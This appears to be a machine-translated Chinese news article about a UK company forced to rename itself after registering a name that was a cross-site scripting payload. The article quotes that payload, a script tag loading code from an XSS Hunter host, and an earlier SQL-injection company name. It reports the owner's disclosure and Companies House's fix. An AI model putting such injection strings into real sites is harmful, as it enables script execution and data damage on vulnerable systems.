一家软件公司的主管认为,用超文本标记语言(HTML)命名会很有趣。
公司之家(Companies House)迫使一家公司更名,此前该公司姗姗来迟地意识到这可能会带来安全风险。
这家公司现在在法律上被称为“那家公司,它的名字曾经包含HTML脚本标签有限公司”是由一位英国软件工程师创建的,他说他这样做纯粹是因为他认为这会是他的咨询业务的“一个有趣的有趣的名字”。
他现在说,他没有意识到Companies House实际上很容易受到他使用的一种极其简单的技术的攻击,这种技术被称为“跨站点脚本”,允许攻击者从一个网站运行另一个网站的代码。
该公司最初的名称是“”>;<;script SRC=HTTPS://MJT.XSS.HT>;Ltd“”。如果名称以引号和雪佛龙开头,任何未能正确处理HTML代码的网站都会误以为公司名称为空,然后加载并执行来自网站XSS Hunter的脚本,该脚本可帮助开发人员查找跨站点脚本错误。
这个脚本本可以简单地发出无害的警报--但它证明了恶意攻击者本可以利用同样的弱点来达到更具破坏性的目的。
类似的名字在过去也曾被注册过,例如“;DROP TABLE”Companies“;--Ltd”,这是受XKCD著名网络漫画的启发,试图实施名为SQL注入的攻击的狡猾尝试,但这是第一次引起回应的此类名称。Companies House已追溯性地从其数据馈送中删除了原始名称,所有涉及其原始绰号的文档现在都简单地写着“公司名称可根据要求提供”。
这位不愿透露姓名的公司主管告诉《卫报》:“政府数字服务(GDS)在安全方面有很好的声誉,其他类似搞笑名字的公司过去也注册过,所以我想可能不会有问题。”
“当我发现有一些小问题时,我立即联系了公司之家和国家网络安全中心,并没有向其他任何人透露这一问题。”
他表示,他没有意识到这会成为一个问题,因为包括>;和“在内的字符被明确允许作为公司名称,这表明该机构已经采取了安全措施来防止此类攻击。
公司之家的一位发言人说:“一家公司注册时使用的字符如果在不受保护的外部网站上发布,可能会给我们的一小部分客户带来安全风险。”我们已立即采取措施减轻这一风险,并已采取措施防止类似事件发生。我们相信,公司内部服务仍然是安全的。“